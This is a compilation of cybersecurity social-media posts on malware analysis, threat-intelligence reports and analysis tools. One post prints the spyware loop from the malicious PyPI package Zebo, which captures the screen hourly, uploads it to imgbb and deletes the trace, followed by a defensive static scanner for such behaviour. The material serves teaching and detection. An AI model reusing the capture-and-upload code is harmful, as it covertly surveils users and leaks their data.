The dangers of cheap IoT smart devices and malware. Takeaway: be highly suspicious of even something so innocent-seeming as a photo frame.
https://gist.github.com/iansinclair/c32aeafdc84e641c537a0a6c549f30b9

With our team at Stratosphere Laboratory AIC FEE CTU, we are organising this year's Honeynet Project Workshop 2025 in Prague!
It will be a unique space to share your passion for deception technologies, honeypots, and cybersecurity with industry leaders and fellow researchers!
We are looking for sponsors who want to support deception research!
Early birds are still open until April 29th! Grab your tickets!
Last days to submit your training and talks proposals!
Students can apply for a Cédric Blancher Memorial Scholarship!
This is the first time the conference is coming to Prague, with previous editions hosted in Copenhagen (2024), Innsbruck (2019), Taipei (2018), Canberra (2017), San Antonio (2016), Stavanger (2015), Warsaw (2014), Dubai (2013), San Francisco (2012), Paris (2011), Mexico City (2010) and Kuala Lumpur (2009).
What a unique opportunity!
https://prague2025.honeynet.org/
Boost and help us spread the word!
ResolverRAT: A New Stealthy Threat in Healthcare Cybersecurity
The emergence of ResolverRAT highlights a significant evolution in malware tactics, especially targeting the healthcare and pharmaceutical sectors. By leveraging sophisticated techniques to evade dete...
https://news.lavx.hu/article/resolverrat-a-new-stealthy-threat-in-healthcare-cybersecurity
The Relentless Tactics of Gamaredon: A Deep Dive into Ukraine's Cybersecurity Nightmare
In the shadow of more notorious Russian hacking groups, Gamaredon emerges as a relentless force in cyber espionage, leveraging simplicity and persistence to execute thousands of attacks against Ukrain...
New Open-Source Tool Spotlight
Want a Windows VM tailored for malware analysis and reverse engineering? FLARE-VM automates setup with Chocolatey and Boxstarter, offering a curated toolbox. Just meet the requirements: Win10+, PowerShell 5+, 60 GB+ disk. Ideal for secure sandboxing. #ReverseEngineering #MalwareAnalysis
Project link on #GitHub
https://github.com/fireeye/flare-vm
#Infosec #Cybersecurity #Software #Technology #News #CTF #Cybersecuritycareer #hacking #redteam #blueteam #purpleteam #tips #opensource #cloudsecurity
— P.S. Found this helpful? Tap Follow for more cybersecurity tips and insights! I share weekly content for professionals and people who want to get into cyber. Happy hacking
In the course of its investigations, @volexity frequently encounters malware samples written in Golang. This reflects the increase in popularity of Golang generally, and presents challenges to reverse engineering tools.
Today, @volexity is releasing GoResolver, open-source tooling to help reverse engineers understand obfuscated samples. @r00tbsd & Killian Raimbaud presented details at INCYBER Forum earlier today.
GoResolver uses control-flow graph similarity to identify library code in obfuscated code, leaving analysts with only malware functions to analyze. This saves time & speeds up investigations!
Check out the blog post on how GoResolver works and where to download it: https://www.volexity.com/blog/2025/04/01/goresolver-using-control-flow-graph-similarity-to-deobfuscate-golang-binaries-automatically/
#dfir #reversing #malwareanalysis
(cyfirma.com) Konni RAT Analysis: Multi-Stage Attack Process and Evasion Techniques https://www.cyfirma.com/research/analysis-of-konni-rat-stealth-persistence-and-anti-analysis-techniques/
Executive Summary:
This report provides a comprehensive analysis of Konni RAT, a sophisticated remote access Trojan linked to North Korean cyber espionage group APT37. The malware employs a multi-stage attack process involving batch files, PowerShell scripts, and VBScript to exfiltrate sensitive data and maintain persistence. The attack begins with a zip archive containing a malicious LNK file disguised as a document. The malware exploits Windows Explorer limitations to hide malicious commands and uses obfuscation techniques to evade detection. Key capabilities include data exfiltration from user directories, system information gathering, persistence through registry modifications, and communication with command-and-control servers. The report includes detailed technical analysis of the attack stages, from initial infection to data exfiltration, along with indicators of compromise and YARA detection rules.
For hobbyist Cobalt Strike Beacon collectors, note that the recently announced 4.11 update introduces a number of changes to frustrate Beacon configuration extraction, namely through the new `transform-obfuscate` field.
When set, this field can apply multiple layers of encoding, encryption and compression (with some recent Beacons observed with a 32-byte XOR key, configurable up to 2048 bytes!).
While still reasonably trivial to decode manually, standard automated workflows (say, through the SentinelOne parser) will now fail, not least because of changes to the well-known field markers.
Beacons with these characteristics have thus far been observed with watermarks indicative of licensed instances, though I imagine it is only a matter of time before the 4.11 capabilities become accessible to all manner of miscreants.
A sample configuration, via a staged Beacon on 104.42.26[.]200 is attached, including the three distinct XOR keys used to decode it.
https://www.cobaltstrike.com/blog/cobalt-strike-411-shh-beacon-is-sleeping
DollyWay Malware Campaign Breaches 20,000 WordPress Sites: A Deep Dive into Cybersecurity Threats
The DollyWay malware campaign has compromised over 20,000 WordPress sites, evolving into a sophisticated redirection system that poses significant risks to both users and site administrators. As cyber...
Let's analyze malware together!

```python
def periodic_screenshots():
    os.makedirs(screenshot_folder, exist_ok=True)
    while True:
        timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
        screenshot_path = os.path.join(
            screenshot_folder, f"{hostname}_{timestamp}.png")
        try:
            screenshot = ImageGrab.grab()            # capture the full screen
            screenshot.save(screenshot_path)
            upload_image_to_imgbb(screenshot_path)   # ship the image off-host
            os.remove(screenshot_path)               # remove the local copy afterwards
        except Exception as e:
            pass                                     # failures are silently swallowed
        time.sleep(3600)                             # repeat every hour
```

This code snippet is from a malicious Python package called Zebo-0.1.0 that was found on the PyPI platform.
Questions:
Put on your analyst hats and share your insights below! Let’s learn and sharpen our skills together.
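As an added example (not part of the post above, nor Zebo's own code), here is a small static scanner that flags the behaviours an analyst would call out in that snippet: screen capture, an endless sleep loop, an upload-style call, deletion of the artifact, and swallowed exceptions. The snippet is embedded as the constructed input, and the "upload" name match is a heuristic.

```python
import ast
# Constructed input: the Zebo-0.1.0 loop quoted above, re-indented. Undefined names
# (screenshot_folder, upload_image_to_imgbb) are fine: ast.parse never runs the code.
ZEBO_SNIPPET = '''
def periodic_screenshots():
    os.makedirs(screenshot_folder, exist_ok=True)
    while True:
        timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
        screenshot_path = os.path.join(screenshot_folder, f"{hostname}_{timestamp}.png")
        try:
            screenshot = ImageGrab.grab()
            screenshot.save(screenshot_path)
            upload_image_to_imgbb(screenshot_path)
            os.remove(screenshot_path)
        except Exception as e:
            pass
        time.sleep(3600)
'''

def dotted_name(node):
    # 'a.b.c' for a Name/Attribute call target, None for anything else (e.g. x().y)
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else None

def scan_source(src):
    """Statically flag the behaviours an analyst would tag in the snippet above."""
    tree = ast.parse(src)
    calls = {dotted_name(n.func) for n in ast.walk(tree) if isinstance(n, ast.Call)}
    calls.discard(None)
    return {
        "screen_capture": "ImageGrab.grab" in calls,
        "upload_call": any("upload" in c.lower() or c == "requests.post" for c in calls),
        "deletes_artifact": bool(calls & {"os.remove", "os.unlink"}),
        # `except ...: pass` keeps the victim (and crash logs) from noticing failures
        "swallows_exceptions": any(
            len(h.body) == 1 and isinstance(h.body[0], ast.Pass)
            for h in ast.walk(tree) if isinstance(h, ast.ExceptHandler)),
        # `while True:` plus time.sleep is the beacon-style schedule (here hourly)
        "infinite_sleep_loop": "time.sleep" in calls and any(
            isinstance(w.test, ast.Constant) and w.test.value is True
            for w in ast.walk(tree) if isinstance(w, ast.While)),
    }

def is_spyware_like(findings):
    """Capture + periodic loop + (exfil or evidence deletion) is the tell."""
    return (findings["screen_capture"] and findings["infinite_sleep_loop"]
            and (findings["upload_call"] or findings["deletes_artifact"]))
```

Running `scan_source(ZEBO_SNIPPET)` sets all five flags, whereas a plain `while True: time.sleep(5)` loop only trips the loop flag and is not classified as spyware-like.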
The tenth article (35 pages) of the Malware Analysis Series (MAS) is available on:
https://exploitreversing.com/2025/01/15/malware-analysis-series-mas-article-10/
I would like to thank Ilfak Guilfanov @ilfak and @HexRaysSA (on X) for their constant and uninterrupted support, which has helped me write these articles.
I promised to write a series of ten articles, and this is the last one. I hope that over the years I have provided professionals around the world with a little help in improving their malware analysis and reverse engineering skills. The series is now complete and this was my last contribution on malware analysis.
Next week (JAN/22) the third article of the Exploiting Reversing Series (ER 03), which is my long-term series, will be released. I hope you like it.
Have an excellent day.
The ninth article (38 pages) of the Malware Analysis Series (MAS) is available on:
https://exploitreversing.com/2025/01/08/malware-analysis-series-mas-article-09/
I would like to thank Ilfak Guilfanov @ilfak and @HexRaysSA (on X) for their constant and uninterrupted support, which has helped me write these articles.
Even though I haven't been on this subject for years, I promised I would write a series of ten articles, and the last one will be released next week (JAN/15).
Have a great day.
GenAI x Sec Advent #18
I’ve built a PCAP analyzer with GenAI—let me explain!
PCAP analysis can be quite tricky, especially if you’re not familiar with the protocols or aren’t sure what to search for. To simplify this, I created a tool that processes PCAP data and passes it into an embedding.
Yes, I used a RAG.
But I used something else too!
I wanted to introduce you to another concept—HYDE or Hypothetical Document Embeddings.
HYDE improves RAG when queries are complex, data are noisy, or patterns are subtle—just like... a PCAP!
HYDE will generate hypothetical insights based on the user’s query (e.g., “What anomalies exist in this traffic?”). Using Hypothetical Document Embeddings, the tool expands your query into a contextual document that captures the intent, to retrieve more relevant packets and patterns!
Think of it this way: you are in a library searching for "AI in cybersecurity". Instead of an exact title, you describe what you need (a hypothetical document). The librarian finds books matching your description, even if the keywords don’t align. You get the idea?
That’s exactly what HYDE does for your queries. It expands the context and meaning, to make your retrieval smarter and more precise.
Have a look at the output below: there is a HUGE difference between the RAG with HYDE and the one without!
Follow along—I’ll share the code tomorrow as I want to explain something else!
HYDE Paper: https://arxiv.org/pdf/2212.10496
GenAI x Sec Advent #14
Mandiant has just released XRefer, an open-source IDA Pro plugin that clusters binary functions and leverages Gemini and other models for the analysis.
The tool can generate a ‘map’ of a binary, to assist analysts to understand the structure of the binary.
In the demo below, you can see how the tool clusters parts of the binary and adds details about malware functionalities such as command execution, C2 communication, or encryption.
I haven’t tried it yet, but it looks promising!
Just pushed a new release of The Yaralyzer, my unexpectedly popular tool for visually inspecting the output of #YARA scans with a lot of colors. Example output below. The change is small: it can now use a directory full of YARA rules files without renaming them all to end in .yara.
https://github.com/michelcrypt4d4mus/yaralyzer
someone has packaged this tool for Kali Linux though I don't know if it's in the distro yet. also available for macOS homebrew via an installer someone made for The Pdfalyzer.
Thomas Roccia at #Microsoft was also kind enough to make The Yaralyzer available via a web interface: https://x.com/fr0gger_/status/1749690000478974283
I'm in a weird position professionally and guess I am looking for a #mentor? Maybe just someone more experienced than me to talk to and not necessarily some long-term commitment of expectations? Growth just isn't going to happen where I'm at and I think I keep getting stuck in an under-/overqualified limbo.
Mainly work in #malwareanalysis #threatintel #detectionengineering with heavy #programming skills.
Always see #CyberMentorMondays does it do anything?
A funny phishing campaign targeting GitHub users with an email notification about a security issue on an existing repository.
Then the captcha verification on a malicious website tries to trick the user into running a shell command on Windows.
PowerShell to be executed by the user:
https://gist.github.com/adulau/6cf6f3e9c5bbd9106af8814d0a22f473
File downloaded https://pandora.circl.lu/analysis/21e8f693-361b-4a04-853c-276f9dd841e4/seed-1XqUr4mADaFYlLAyrBH8oQUBgOoEbceZ586b8h05YyA - Lumma Stealer
Malicious domain analysis. https://lookyloo.circl.lu/tree/91106035-dfec-4acc-af06-c9fc36c62774
So far, I have written 706 pages to help the security community. My goal will be writing new articles of the Exploiting Reversing Series (ERS), which is focused on security research. However, I am planning to write one or two additional articles of my previous series MAS (Malware Analysis Series) to finish it off.
10. https://exploitreversing.com/2024/01/03/exploiting-reversing-er-series-article-02/
09. https://exploitreversing.com/2023/04/11/exploiting-reversing-er-series/
08. https://exploitreversing.com/2024/08/07/malware-analysis-series-mas-article-08/
07. https://exploitreversing.com/2023/01/05/malware-analysis-series-mas-article-7/
06. https://exploitreversing.com/2022/11/24/malware-analysis-series-mas-article-6/
05. https://exploitreversing.com/2022/09/14/malware-analysis-series-mas-article-5/
04. https://exploitreversing.com/2022/05/12/malware-analysis-series-mas-article-4/
03. https://exploitreversing.com/2022/05/05/malware-analysis-series-mas-article-3/
02. https://exploitreversing.com/2022/02/03/malware-analysis-series-mas-article-2/
01. https://exploitreversing.com/2021/12/03/malware-analysis-series-mas-article-1/
I accidentally removed this; 1 sec
Hello! I just joined; a friend mentioned this nice social and I just joined. Happy to be here! A small intro: I am 24 years old, and I am always into reverse engineering. More specifically, malware reversing, including rootkits, EQGRP stuff, and such. Nice to meet everyone!
If needed, my github is this:
https://github.com/loneicewolf
(I always include it in intros)
Wishes and Saluting Sweden!
DMS/PMS open; if needed ^_^
Hello! I will be hosting a workshop on Reversing Rust Binaries this upcoming Friday, at @NorthSec in Montréal!
https://nsec.io/session/2024-reversing-rust-binaries-one-step-beyond-strings.html
This workshop focuses on some practical skills for reversing Rust binaries, and using strings in Rust binaries as an entry point to exploring reversing them!
The workshop will be on Friday, May 17th, from 9am-12pm EDT (UTC -4). The conference and workshops will be streamed; here's the link for the Workshop 1, Day 2 stream, which is my timeslot: https://www.youtube.com/live/VH7ID5S7_pI
Edit: A repository with pre-workshop setup instructions, and the sample code for the workshop, is now available here: https://github.com/cxiao/rust-reversing-workshop-northsec-2024/
Edit 2: That repository now has a link to a preconfigured Ubuntu VM image with all necessary tools and files for the workshop, to make setup for the workshop easier!